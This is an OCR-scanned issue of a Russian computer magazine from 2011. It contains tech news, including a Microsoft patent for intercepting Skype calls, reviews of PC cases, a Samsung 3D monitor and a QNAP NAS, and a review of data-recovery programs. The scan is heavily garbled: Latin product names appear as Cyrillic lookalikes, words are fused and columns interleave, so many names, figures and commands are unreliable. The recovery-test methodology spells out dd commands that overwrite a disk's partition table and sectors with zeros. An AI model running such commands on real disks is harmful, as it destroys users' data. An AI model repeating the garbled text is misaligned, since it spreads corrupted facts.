дней, при этом количество загрузок не сообщается. Мораль этой истории 
такова: всегда проверяй контрольную суммутех файлов, которые ты скачи- 
ваешь. Даже если речь идето каком-то серьезном приложении. 
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Н6006ЕЕ В ЦИФРАХ 


Про финансы: 


$9.ОЗ млрд 


составила рекордная выручка 
компании за второй квартал 2011 
года, правда цифра приведена без 
затрат на привлечение трафика. 


$6,23 млрд 


компания заработала 
на собственных сайтах. 


$2,48 млрд 


принесли партнерские сайты 
через программы А9дЗепзе. 


$2,11 млрд 


во столько обошлось привлечение 
трафика (часть этой суммы идет 

в том числе производителям 
браузеров}. 


Впечатляющие цифры об Апаго, 


Спготе и боо{е+ 


Про команду: 


23, 08 


штатных сотрудников ра- 
ботает в подразделениях 
Соод(е по всему миру. 


Про мобильную 
платформу: 


500 000 


устройств на Апаго!а 
активируются каждый день. 


130 млн 


девайсов на базе Апаго!а уже 
используются во всем мире. 


© млод 


загрузок сделали из Апаго!а 
Магке! а пользователи. 


Про веб: 


>160 млн 


человек пользуются 
браузером бооч(е СПготе. 


2,3 млрд 


столько раз нажимается 
кнопка «+1» ежедневно. 


Про социальную сеть: 


$20 млрд 


столько суммарно 
инвестировали в боочц(е+. 


ТО млн 


пользователей зарегистриро- 
валось в боод(е+ за две недели 
после старта. Это 1,3% от всей 
аудитории Гасероок. 


Румынские власти совместно с ФБР и агентами секретной службы 
арестовали 90 подозреваемых в мошенничестве на еВау. 


ПРОСЛУШКА КУРЕ НЕ ЗА ГОРАМИ 


Спецслужбы многих стран мира давно точат зуб на 5Куре зато, 
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что его нельзя легально и удобно прослушивать. Программу часто 


называют идеальной для террористов, а разработчиков множество 
раз пытались призвать к ответу. После того как в мае 5Куре был при- 
обретен корпорацией М!сгозо за $8,5 млрд, многие ожидали неко- 
торых перемен в этой области и, похоже, перемены действительно 
последуют. Стало известно, что еще в декабре 2009 года, задолго 

до сделки по покупке 5Куре, М'!сго5о подала заявку на патент 
технологии «легального перехвата» (1еда( |п{егсер, позволяющей 
незаметно для юзера записывать звонки, выполняемые в 5Куреи 
других \Уо!Р-сетях. По сути, технология напоминает стандартные 
инструменты, которые используются телекоммуникационными 
компаниями и производителями оборудования связи для того, 
чтобы удовлетворять государственным требованиям в прослушке. 
Документ гласит: «данные, связанные с запросом на установление 
соединения, изменяются таким образом, чтобы соединение про- 
ходило через прокси для возможности записи и модификации». Су- 
ществующие методы, предназначенные для перехвата разговоров 
по аналоговым линиям (РОТ5}, в сетях МР и других сетях, основан- 
ных на современных технологиях, не работают. Запатентованная 
технология должна это исправить. 


> 015 


Ш № Антон Николаев 


совруз У 1 ВАК 


Тестирование корпусов среднего ценового диапазона 


©вВыбор корпуса — дело не самое простое. И кданному процессу 
необходимо подойти весьма осознанно, со знанием всех тонкостей. 
Чтобы ты знал, на какие особенности будущего жилища для твоего 
компьютера необходимо обратить внимание, давай перейдем 
непосредственно к сегодняшнемутест\. 


Братство кольца 


Стоиттолько взглянуть на широкий ассортимент всевозможных корпусов 
на рынке, чтобы понять — выбор этот не легче приобретения автомоби- 
ля. Вспоминаются слова известного героя: «Машина — не роскошь, а 
средство передвижения». Цитата турецкоподданного Остапа Сулеймана 
однозначно сможет разделить всех пользователей ПК на две группы: 
налюдей, которым все равно, как выглядит корпус, вмещающий все 
«железо», и натех, кто получает не только эстетическое удовольствие от 
красивого девайса, но и функциональную пользу при сборке и эксплуата- 
ции системного блока. Сегодняшнее тестирование сформировано именно 
для второй категории людей. Ведь порядка 200 долларов за «железное 
хранилище» отважится отдать лишь этот контингент пользователей. А вот 
будутли данные траты напрасны, нам и предстоит сегодня выяснить. 


Методика тести рования 


Главное, что мы должны поведатьтебе об этих корпусах — это ощущения 
(положительные и отрицательные}, которые мы испытали в процессе экс- 
плуатации данных устройств. Поэтому акцент в статье будет сделан именно 
на это. Однако не стоит забывать и протемпературные показатели «желе- 
за», установленного внутри корпуса: за комфортные и прохладныеусловия 
комплектующиеточно скажуттебе спасибо в видетихой и долгой работы. 
Во времятестирования мы измерялитемпературу процессора, видеокарты 
и жесткого диска. «Камень» максимально загружался вычислительным 
приложением [пХ. А вотвидеокарта — синтетическим приложением 
ГигМагк. Наконец, температуру НОО фиксировал программный комбайн 
АШАбА Ежгете Еда Шоп. Комплектующиетестировались в закрытом корпусе 
втечение 20 минут, все доступные вентиляторы работали в штатном режиме. 
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Тестовый стенд: 


Системная плата: 

АФКоск 890ЕХ Беихе3 
Процессор: 

АМОРвепот 1 970, 3500 М 
Кулер: 

Гаглап СМР 10Х Ехнете 
Оперативная память: 

Согзаи ВоттаюгСТ 2000 МГц, 4Гб 
Видеокарта: 

ЗАРРНИКЕ Кадеоп НО 6970 
Жесткий диск: 

\\Мезет Бана \\/О2001ЕА55, 2 Тб 
Блок питания: 

ЕОРЕРрзНоп, 700 Вт 
Операционная система: 
\МЛпао\/$ М $1а хб4 
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Дегосоо! Хргедаюг 
Ем] Васк ЕаМоп 


Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ Нех АТХ, Е-АТХ, ХЕ--АТХ 

РАЗМЕЩЕНИЕБЛОКА ПИТАНИЯ: снизу 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 

ВЕНТИЛЯТОРЫ: 2х230 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НАЛИЦЕВОЙ ПАНЕЛИ: 4х05В 2.0, 1хе5АТА, наушники, микрофон 


УТУ Я Дому 


На борту этого очень большого корпуса целых два 230-миллиметровых 
вентилятора, даеще соранжевой подсветкой. По периметру устройства 
есть масса свободных посадочных мест под менее габаритные пропел- 
леры, втом числе и на декоративном пластиковом окне. Внутри «разбро- 
саны» эластичные резиновые перегородки для того, чтобы сборщик мог 
спрятать все провода. В этом корпусе реализована идея безвинтового 
крепления большинства девайсов. Винчестеры фиксируются при помо- 
щи выдвижных салазок, а РС|-устройства — посредством пластиковых 
защелок. Но никто не помешаеттебе воспользоваться старыми добрыми 
винтами. 

Свободного пространства в корпусе очень много. Кроме того, необъят- 
ные просторы Аегосоо( Хргедафог Ем Впаск Еа\!оп позволят разместить в 
нем достаточно габаритную СВО. 

Все-таки шум от двух крупногабаритных вентиляторов весьма сущест- 
венный. Даже несмотря на то, что на лицевой панели есть регуляторы 
скорости вращения оных. 
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Атес 0Е-35 


Технические характеристики: 

ФОРМ-ФАКТОР: Мтп!-[ТХ, тАТХ, АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: снизу 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 3 

ОТСЕКОВ ДЛЯ 3.5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 

ВЕНТИЛЯТОРЫ: 3х1 20 мм, 1х140 мм 

ОТВЕРСТИЯ ДЛЯВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 2хОЗВ 2.0, наушники, микрофон 


УТУ Дим 


О качестве и о высоком уровне исполнения продуктов Ащес можно 
говорить очень долго. Поэтому мы лучше сконцентрируемся на модели 
ОЕ-35, выполненной в черных тонах. 

Корпус имеет весьма небольшие габариты, что можно расценивать и как 
плюс, и как минус. На что точно инженеры Ащес не поскупились, так это 
на количество вентиляторов внутри. Три «карлсона» из четырех светятся 
ярко-белым цветом, что очень необычно и красиво. Кстати, скорость 
всех «ветродуев» регулируется. 

Большое пластиковое окно на боковой стенке позволитувидеть все 
комплектующие внутри. Приятно, что инженеры Ащес не забыли про 
гипотетическое наличие 550. Именно для твердотельных накопителей в 
корпусе присутствует несколько 2,5-дюймовых посадочных мест. 
РасполагаетАщес ОЕ-35 и встроенной док-станцией, которая служит 
для «горячей» установки запоминающих устройств. Оченьудобное 
нововведение. Все же небольшие габариты сказались на свободном 
пространстве корпуса. Там оченьтесно, и мы настоятельно рекомендуем 
использовать только модульный блок питания. Нашатестовая видеокар- 
та влезла в недра Ажес ОЕ-35 струдом. 

Четыре вентилятора — это, конечно, хорошо, но не для твоих ушей. 

Шум открыльчаток слышен весьма отчетливо, и врядли кто-то захочет 
мириться с этим. 

Не секрет, что продукты фирмы Ажес стоят немалых денег, инынешний 
представитель не стал исключением. 
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Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: снизу 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 4 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 6 

ВЕНТИЛЯТОРЫ: 1х120 мм, 2х200 мм 

ОТВЕРСТИЯ ДЛЯВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 4х0ЪЗВ 2.0, 1хЦ$В 3.0, 1х1ЕЕЕ1 394, 
наушники, микрофон 


ТУЗ м 


Мы знаем Согзаг как первоклассного производителя оперативной 
памяти. Но вектор деятельности американской компании постоянно 
расширяется. 06 этом свидетельствует появление на рынке кулеров, 
блоков питания, гарнитур и корпусов под этим брендом. В итоге, за 

что бы ни бралась эта компания, результат окажется положительным. 
Первая ассоциация, пришедшая нам в голову после «откупоривания» 
боковой крышки — простор. Внутри Согзаиг 600Т очень много свободного 
пространства. Очень много — означает очень-очень-очень много сво- 
бодного пространства. Материнская плата буквально теряется внутри 
этого «гиганта». Сразу бросаются в глаза уже отмеченные в прошлых 
моделях резиновые мембраны, которые вмонтированы для удобной 
компоновки проводов и шлейфов. Два огромных вентилятора с диодной 
подсветкой расположены весьма удачно: один обдувает винчестеры, 

а второй — процессорный кулер и память. На верхней панели, помимо 
весьма полезных разъемов, есть регулятор скорости вращения установ- 
ленных вентиляторов. Кстати, неприятного шума от последних замечено 
небыло. 

Пожалуй, единственный минус модели — несколько завышенная цена. 
При этом комплектация Согзаиг 600Т, впрочем, как и всех остальных, 
весьма скудная. Набор винтов и несколько стяжек для проводов — все, 
чем ограничился производитель. 


› 018 


| 3500 руб. 


Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ 

РАЗМЕЩЕНИЕ БЛОКА ПИТАНИЯ: сверху 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ВЕНТИЛЯТОРЫ: 2х120 мм 

ОТВЕРСТИЯ ДЛЯВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫНА ЛИЦЕВОЙ ПАНЕЛИ: 2х05В 2.0, 1хебАТА, 1хЕге\\Мге, науш- 
ники, микрофон 


УК уу 


Что только не производит компания С!САВУТЕ. Заниматься корпусами 
она начала лет семь назад. За это время у данного бренда накопился 
определенный опыти собственные наработки. Очень строгий дизайн 
корпуса С|САВУТЕ Сир!о 6140 напоминает эдакий монолитный шкаф. Он 
не очень большой и, пожалуй, самый легкий из всех участников сегод- 
няшнего тестирования. Все из-за применения алюминия. Два вентиля- 
тора объединены в один трехпиновый разъем, что очень удобно. Кстати, 
оба почти не шумят. На боковой стенке есть решетка. По большому счету, 
она служит декоративным элементом корпуса. Отсек для блока питания 
расположен сверху, как в классическом варианте компоновки элементов. 
Оптические накопители скрываются под тяжелой металлической двер- 
цей, на вершине петли которой, кстати, находится кнопка включения ПК. 
Очень оригинальный и интересный ход. Коммуникационные разъемы 

на «макушке» системного блока спрятаны под пластиковой шторкой. В 
наличии пара ЗВ 2.0 и по одномуе АТА, Ниге\\ге, атакже мини-джеки 
для наушников и микрофона. 

Вся периферия внутри крепится при помощи пластиковых защелок. Нам 
показалось, что это не самый удобный вариант, пришлось демонтиро- 
вать. Тестовая видеокарта не влезла в этот корпус, помешала корзина 
для жестких дисков, но благодаря тому, что ее можно снять, плату мы 
все-таки установили. 


ХАКЕР 09 /152/ 2011 


5600 руб. 


мег5опе Рауеп 2 


Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ, 5$! СЕВ 

РАЗМЕЩЕНИЕБЛОКА ПИТАНИЯ: сверху 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ВЕНТИЛЯТОРЫ: 1х1 20 мм, 3х180 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 2хОЗВ 2.0, наушники, микрофон 


УЗВ м 


Это самый необычный корпус в нашем тестировании применительно к 
расположению в нем компонентов. Однако плохой такую реализацию 
назвать нельзя, однозначно. Скорее, наоборот. Все здесь продумано с 
учетом лучшего охлаждения элементов системного блока. Вся поверх- 
ность днища закрыта тремя большими вентиляторами. А вотпериферия 
крепится сверху. Результаты тестирования только подтверждают наши 
высказывания. 

Задумка инженеров заключается втом, что абсолютно все провода 
выходят из одного места, то есть из-под верхней крышки. С точки зрения 
компоновки «хвостов» — это очень удобное решение, но вотеслиты 
вынужден часто пользоваться разъемами на материнской плате, такой 
вариант будет не самым удачным, ведь они будут полностью перекрыты 
этой крышкой. 

Корпус оченьтяжелый, на него не пожалели ни идей, ни стали. Все эле- 
менты крепятся при помощи винтов, а свободного пространства здесь 
хоть отбавляй. Положительным моментом является и армированное 
пластиковое окно, сквозь которое будет видно твою мощную систему. 

А именно такой она, скорее всего, и будет, потому что устанавливать в 
мег {опе Ка\уеп 2 слабое, беспомощное «железо» — кошунство! 
Помимо необходимого для сборки компьютера набора в комплекте пос- 
тавки больше нетничего интересного. 


Итоги 


Нам больше кописанию данных продуктов добавить нечего, атебе оста- 
ется только сделать правильный выбор в пользу того или иного корпуса. 
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10000 руб. 


ТлеттаНаке 1е\уе!| 10 СТ 


Технические характеристики: 

ФОРМ-ФАКТОР: тАТХ, АТХ, Е-АТХ 

РАЗМЕЩЕНИЕБЛОКА ПИТАНИЯ: снизу 

ОТСЕКОВ ДЛЯ 5-ДЮЙМОВЫХ УСТРОЙСТВ: 4 

ОТСЕКОВ ДЛЯ 3,5-ДЮЙМОВЫХ УСТРОЙСТВ: 5 

ВЕНТИЛЯТОРЫ: 1х200 мм, 1х140 мм 

ОТВЕРСТИЯ ДЛЯ ВОДЯНОГО ОХЛАЖДЕНИЯ: есть 

РАЗЪЕМЫ НА ЛИЦЕВОЙ ПАНЕЛИ: 2хО5$В 3.0, 4х05$В 2.0, 1хеб АТА, науш- 
ники, микрофон 

ВНЕКОНКУРСА 


УТУ м 


Последний участник сегодняшнего тестирования — ТПеггпаЦакКе [е\е| 

10 СТ. Компания на рынке ужетак давно, что может себе позволить 
создавать новые проекты совместно с ВМ\М\. 06 этом свидетельствует 
специальный сертификат. Этот «сундук» очень большой и оченьтяжелый 
[12,7 килограммов). Это действительно роскошный корпус, который к 
моменту выхода номера в печать должен появиться в продаже. Дизайн 
ТрегтаЦаке 1 еуе! 10 СТ поистине футуристический, есть на что посмот- 
реть. Само собой разумеется, что внутри уйма свободного места (если 
щелкнуть пальцами в недрах этоготитана, раздается эхо}. Весьма инте- 
ресна и реализация подключения жестких дисков. Контакты уже на месте, 
остается только вставить винчестер и подключить идущий в комплекте 
провод к блоку питания. Все три вентилятора подключаются с помощью 
одного по(ех-разъема. В верхней части ТВегтаЦаке 1еуе! 10 СТ есть 
несколько кнопок, которые отвечают за скорость вращения пропеллеров 
и за цвет, которым всетри будут «переливаться», словно новогодняя елка. 
Все внутреннее добро можно закрыть на ключ, какавтомобиль. 

Чтобы установить ТПегтаЦакКе |1 е\уе[ 10 СТ, понадобится много свободно- 
го пространства на столе или под столом. Фактически потребуется гараж, 
ведь это почти что авто, только без руля. 


Поэтому традиционно перейдем к раздаче наград и комплиментов. 
«Выбором редакции» сегодня становится модель 5ЦуегХопе Ка\уеп 2, ко- 
торая произвела очень приятное впечатление нетолько из-за грамотной 
эргономики, нои из-за потрясающего, футуристического дизайна. 2 
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Тестирование монитора 
оатзипд 527А7500 


Технические ха рактеристики: 
ДИАГОНАЛЬ ДИСПЛЕЯ: 27" 

МАКСИМАЛЬНОЕ РАЗРЕШЕНИЕ: 1920х1080 точек 
ТИП МАТРИЦЫ: ТЕТТМ 

ЯРКОСТЬ: 300 кд/м2 

СТАТИЧЕСКАЯ КОНТРАСТНОСТЬ: 1000:1 

ВРЕМЯ ОТКЛИКА: 2 мс 

ИНТЕРФЕЙСЫ: НОМ/, О! р(ауРом, аудиовыход 


©) Большие дисплеи любятне только владельцы навороченных 
смартфонов. Ни вчем себе не отказывать приятно и сидя за ПК. 
Особенно, если компьютер используется нетолько в «офисных» 
целях. Если на вашем столе найдется место для 27-дюймового 
монитора — то почемубы ине обзавестись оным? Аеслиу васуже 
имеется мощная видеокарта, то полного удовольствия отее использо- 
вания с заурядной «семнашкой» вы не ощутите. Получить новые 
впечатления от работы и развлечений за компьютером поможет 
монитор $атзипа 527А 7500. 


Присмотримся поближе 


Про диагональ — один из главных козырей героя сегодняшнеготести- 
рования — мы уже намекнули, но повторимся — это целых 27 дюймов. 
Покрытие дисплея глянцевое, что, какуверяют производители, улучша- 
етцветопередачу, но превращает монитор в громадное зеркало. 
Подставкау $атзипд 527А7500 имеет оригинальную цилиндричес- 
кую форму, очень скромного размера по сравнению с дисплеем, но 
уверенно удерживаетего отпадения. Поначалу на ней видналишь 
одна кнопка — сенсорная клавиша питания. Нажимаем на нее — и как 
по мановению волшебной палочки вокруг поочередно загораются 
остальные. Как вы, наверное, уже догадались, все кнопки сенсорные. 
В общем, 5агтзипд 527А7500 представляет собою очень изящного ги- 
ганта мониторного мира. Внешних интерфейсов, не считая выхода для 
наушников, всего два: НОМ!и О!5р(ауРон. На первый взгляд скромно, 
но вряд ли кому-то придет в голову подключать подобный 30 -монитор к 
старенькому компьютеру с видеокартой без НОМ]-интерфейса. 


Методика тести рования 


Дабы протестировать данный монитор, мы воспользовались колори- 
метром Союг\ оп 5рудегЗЕЩе. Результаты тестирования видны на 
графике: три линии обозначают красный, зеленый и синий цвета — ос- 
нову цветовой модели КСВ. Идеальной считается цветопередача, если 
всетри линии, не отклоняясь, идут из левого нижнего угла в верхний 
правый. Соответственно, чем больше отклонение, тем менее реалис- 
тичную картинку мы видим на экране. С помощью все того же колори- 
метратакже измеряется цветовой охват — он должен быть не меньше 
стандарта $КСВ. Также мы оценивали дизайн монитора, углы наклонов, 
удобство работы с меню и дополнительные функции. 


В ногу со временем 


Но не будем судить о книге только по ее обложке. Пришло время разо- 
браться, каков 5агтзипа 52'7А7500 в деле. Дисплей поддерживает раз- 
решение вплоть до 1980х1080 пикселей. То есть, можно смело набирать 


› 020 


стопку НО-фильмов и игр. Другая особенность монитора — использо- 
вание в качестве подсветки светодиодов, а не привычных ламп с холод- 
ным катодом (ССЕЦ. Это позволило сделать корпус дисплеяеще более 
тонким и, по заверению маркетологов, усилило «сочность» отображае- 
мых цветов. Так или иначе, хорошо уже то, что в светодиодах, в отличие 
от ССЕЕ, не содержится ртути. Поэтому мониторы можно ронять на пол 
один за другим, не боясь случайно вдохнуть ядовитые испарения. Но не 
нужно! Идем дальше. Было бы жалко, если такой монитор был бы приго- 
дентолько для офисных нужд и проверки электропочты. Фанаты все- 
возможных экшн-игр будут рады, узнав, что отклик матрицы составляет 
всего 2 мс, что позволит насладиться самыми динамичными сценами 
изихлюбимых стрелялок и гонок. Нуи на сладкое — поддержка 30. В 
комплект входят специальные активные очки, синхронизирующиеся 

с монитором по Виаюос(й. Жаль, что только одни, на дополнительную 
пару придется раскошелиться отдельно. Что вы, вполне возможно, и 
захотите сделать, ведь $Затзипд 527А 7500 может не только отображать 
ЗО-контент, но и конвертировать в объем любое 20-изображение, будь 
то обычные фильмы или фотоснимки. 


ВЫВОДЫ 


Втом, что размер все-таки имеет значение, мы убедилисьеще раз. Ос- 
тальные немаловажные для современных мониторов характеристики: 
поддержка ГиЦ НО, малое время отклика матрицы и, наконец, стильный 
дизайн — также присутствуют в $Затзипд 527А7500. Неплохо было 
быещеи ТВ-тюнер в придачу получить, но хорошего, как говорится, 
понемножку. 

+ Конвертация 20 в ЗВ налету. 

- Глянцевое покрытие дисплея. 
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Цветовой охват даже немно- 
го больше стандартного 


Цветопередача 
на «отлично» 
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ТОЛЬКО 
РКОГРЕССИРОВАТЬ! 


Тестирование высокопроизводительного сетевого 
накопителя (МАР Т5-459 Рго || 


© Стоит начать пользоваться МАз’ами, как сразу же понимаешь, какую 
колоссальную пользу несут эти устройства. Новинка от компании ЦМАР 
придется по вкусу и продвинутым домашним пользователям, итем, 
кому нужно сделать файловое хранилище для небольшого офиса. 


СЯ Ц$, АН Ц$, Го НИ$! цифровых видеокамер, ИБП, \\-Н!-адаптераи УЗВ-принтеров. При 


Главное в МАб’е, несомненно, железо. Новый ОМАРТ5-459 Рго Побза- всех наворотах и мощном «железе» ОМАР Т$-459 Рго П обладает очень 
велся поддержкой мощного центрального процессора ге! Ают 0525, низким уровнем электропотребления: 19 Втв спящем режимеи 35 Втво 
функционирующего на частоте 1800 МГц. Поверь, для сетевого хранили- время работы. 

ща двухъядерный Ают стакой тактовой частотой - отличный вариант. 


Технология Нурег ТПгеа@ тд позволяет помимо двух физическихядер О прошивке и не только 


задействовать еще и два виртуальных. На подмогу чипу разработчи- Железная составляющая сетевого накопителя, несомненно, важна. 
ки выделили 1 Гбайтоперативной памяти стандарта ООКЗ. Данного Но не стоит забывать и о прошивке устройства. Во многом за счет нее 
объема хватит слихвой при использовании устройства дома. Ноесли со временем оно не устареет морально, а наоборот, обрастет новыми 
потребуется, чтобы ОМАР Т$-459 Рго трудился на благо небольшого функциями. Например, последняя версия прошивки 3.4 вводит под- 
офиса, то всегда можно увеличить объем ОЗУ: хранилище обладает воз-  держку для многодисковых накопителей массива КА 10, совмеща- 
можностью расширения оперативной памяти до 3 Гбайт. Кроме этого, ющего в себе преимущества КА Чи КАШ 1. Также с новой прошив- 
хранилища ОМАР перешли на стандарт АТА 3.0. Подводя промежу- кой стала доступна функция КТВК (Беа[-Нте Ветое КерИсайоп), 
точный итог, мы видим, что МАР Т5-459 Рго Пявно превосходит своих которая предоставляет возможностьудаленной репликации в режиме 
предшественников: например, в отличии отмодели 15-459 Рго ис- реального времени или по заданному расписанию. Кроме этого, есть 


пользуется более шустрый процессор и более прогрессивный стандарт — возможности для бэкапа данных на облачные сервисы Ататоп $3 и 
памяти ООБЗ (вместо О0Е?]. Отличительной особенностью всех сетевых Ееррап{Огуе. Список обновлений в новой прошивке можно пере- 
накопителей ОМАР является богатая функциональность. Гак, новинка числять еще долго, но лучше познакомиться со всеми функциями 
обладает сразу парой гигабитных портов К./-45, которые поддерживают хранилищ ОМАР на официальном сайте компании: м/^/\м/. апар.ги. 
использование режимов балансировки нагрузки, отказоустойчивости 

и Ми -Р. Крометого, по всему корпусу МАР Т5-459 Рго Празбросано Выводы 

пять портов УЗВ и парочка е АТА. Нельзя не отметить и наличие двух ОМАРТ$-459 Рго является превосходным решением для хранения и 
портов стандарта Ц$В 3.0, значительно ускоряющего обмен данными с управления данными как дома, так и вофисе: за счетудобного интер- 
внешними устройствами. В совокупности с мощным «железом» накопи-  фейсауправления, огромного количества мультимедийных функций, 
тель без проблем справляется с обработкой информации отнескольких полной реализации интерфейса 15С $! и высокой надежности. ЗЕ 
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Быстро восстановил — 
значит, не удалил 


Выбираемп А ограмму 


для восстановления 


анных 


© Еслиты ни разу не терял важные данные и не сталкивался с 
необходимостью их восстановить, могу тебе сказать только одно — 
скоро тебе это предстоит :). Чтобы быть во всеоружии и не тратить 
время на поиск подходящего софта, мы выбрали для тебя самые 
толковые решения. Платные и бесплатные. 


Методикатести рования 


Если поспрашивать опытных друзей и коллег, какую программу 
они используют, когда часть файлов неожиданно канула в воду, то 
варианты будут самые разные. Признаюсь, и уменя есть вполне 
четкое представление, кто на что способен. Но чтобы придать объ- 
ективности этому материалу, мы решили провести полноценное 
тестирование. Для этого мы смоделировали три самые типичные 
ситуации и проверили, как с ними справятся испытуемые приложе- 
ния. Тыи сам наверняка сталкивался с подобными задачами: 

1. Восстановление удаленных мимо корзины (<$1Ш+4е[>] документов. 
2. Восстановление данных после быстрого форматирования (уда- 
ления таблицы файловой системы диска). 

3. Восстановление файлов после уничтожения таблицы разделов и 
частичного повреждения служебных структур файловой системы и 
данных (запись «мусора» в начало и произвольные места диска). 
Как были смоделированы условия для первых двух тестов, думаю, 


ни у кого вопросов не вызовет. Для организации третьего теста 
была использована любимая многими нашими читателями кон- 
сольная юниксовая утилита 44. С ее помощью, во-первых, была 
затерта таблица разделов командой $и4до а4 1+=/аеу/хего о+=/ 
ае\у/за61 6$=512 соип*=1 сопу=поегпог ($961 — это диск, над 
которым проводились эксперименты]. Во-вторых, были затерты 
случайные секторы на диске посредством применения некоторого 
количества раз команды $идо а4 1+=/аеу/тего о+=/4еу/за61 
65$=512 соип{=1 зееК=п сопу=поеггог с разными значениями 
параметра п, гдеп — случайное число из диапазона от 1 до 511968 
(511968 — количество секторов на испытуемом диске]. С испытуе- 
мого раздела был снят образ, который накатывался обратно для 
теста каждой из программ. В итоге из 16 исследуемых приложений 
мы выбрали для обзора всего девять: 6 платных и 3 бесплатных. 
Бесплатные программы должны были выдержать хотя бы первые 
два теста, а платные — обязательно всетри. Обзор начнем с по- 
следних. 
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ОС: Мп ом/5 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: ЕАТ12/16/32/ехЕАТ, МТЕ$, НЕЗ/ 
НЕ5+, ШВ ОЕ5 2, ЕЕ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 
СТОИМОСТЬ: $79 — $179 


САЙТ: млм. Ча{а-гесомегу-оН\маге. пе 


К-${и410 недаром открывает наш обзор, это одно из са- 
мых известных решений для восстановления данных. 
С классным интерфейсом и шустрой скоростью работы. 
Помимо того, что приложение прекрасно справилось 
со всеми тремя тестами, ему есть чем еще похвастать- 
ся. Гак, К-5{и41о умеет создавать файл-образ диска 
или раздела, с которого предполагается восстанавли- 
вать данные. Это крайне полезная опция втом случае, 
если есть риск, что носитель физически неисправен 

и вот-вот прикажет долго жить. Еще одна важная и 
актуальная особенность Б-5{иЧ10 — восстановление 
информации с разделов, которые были объединены 

в КАО-массив. Работа с программным и аппаратным 
КА реализована прекрасно сточки зрения удоб- 
ства — в большинстве случаев, массивы распозна- 
ются автоматически и доступны наравне с обычными 
жесткими дисками. Но если по каким-либо причинам 
этого не произошло, программа позволяет создать 
виртуальный массив и работать с ним как с реальным. 
Главное — знать порядок расположения дисков в нем. 
С помощью К-5{и9то можно также создать загрузоч- 
ный диски применять его в случае, когда потеряны 
данные, необходимые для загрузки операционной 
системы. Теперь что касается цены. Стандартная 
версия стоит $79, но можно сэкономить и приобрести 
за $49 версию, которая будет поддерживать только 
одну из файловых систем — ГАГили МТЕ5. Естьи более 
дорогие варианты, например, с возможностью вос- 
становления данных в локальной сети. 


Основные преимущества: возможность создания 
образа диска, простой и понятный интерфейс, работа с 
КА!О, восстановление данных в локальной сети, созда- 
ние загрузочного диска. 

Основные недостатки: цена. 
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› ШЮ 


Стоитотметить суще- 
ствование программ, 
предназначенных 
для восстановле- 

ния исключительно 
мультимедийных 
файлов [например, 
РВото Кесоуегу бепицз, 
ОзК|г{егпа[$ На$й 
Весоуегу). Эти при- 
ложения, в большин- 
стве своем, способны 
пройти только первый 
изнашихтестов, а 
потому, казалосьбы, 
бессмысленно их рас- 
сматривать. Ноучти! В 
некоторыхузкоспециа- 
лизированных случаях 
они могут оказаться 
эффективнее стан- 
дартных решений. 


а рые 


о бен Вы ГАО 


ЖИ "РУ вт слете ИА, 9 ТЫ 
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р ь 


ОР Ехр|огег Кесоуегу 


ОС: МИп9ом/5, Чпих, В50, Мас 05Х 

ТИПЫ ФАЙЛОВЫХ СИСТЕМ: МТЕФ, АТ, ЕхЕ2, Еж, Ех{4, ХР, 
РЕБЕ ЕЗ 

ЯЗЫК ИНТЕРФЕЙСА: многоязычный (включая русский] 
СТОИМОСТЬ: = 21,95 — 129,95 


САЙТ. мили. иЁ5ехрюгегсопл 


В том, что этот продукт пройдет все три теста, я даже не 
сомневался. ЦЕ$ Ехр(огег Кесоуегу находится в одном 
классе с К-З{и9!0: как Мегседез 5-класса, но только 

не среди машин, а в сфере восстановления данных. 
Программа также всеядна в плане вида файловых 
систем и даже поддерживает по-настоящему экзоти- 
ческие файловые системы, вроде журналируемой ХЕ. 
Создание образа диска или раздела? Разумеется. Вос- 
становление данных как с локальных, так и с сетевых 
носителей? Да, и даже больше: разработчики особенно 
подчеркивают возможность работы с МА$ различных 
производителей. Единственное видимое отличие от 
К.5{и410, пожалуй, в скорости работы: ЦЕ$ Ехр{огег 
работает несколько медленнее. И на мой взгляд, про- 
грамма не так интуитивна в плане использования. 
Зато в плане цены решение более гибко. ЦЕ$ Ехр(огег 
Кесоуегупоставляется в нескольких редакциях — 
5{апдага, рго!ез!опа| и га!5е аа гесоуегу. Стоимость 
для домашнего использования соответственно &,39,95, 
Е49,95 и &21,95. Что интересно, версия ргоез1опа[ в 
целом менее функциональна. Но в отличие отвер- 

сии ${апдага заточена на работу с КАЮ-массивами и 
муит-файлами (виртуальными образами]. Последняя 
версия [или точнее набор версий] — га!зе Ча{а гесоумегу 
— самая простая и умеет работать только с одним из 
типов файловых систем (для каждой ФС есть своя га1<е- 
версия). 


Основные преимущества: возможность создания 
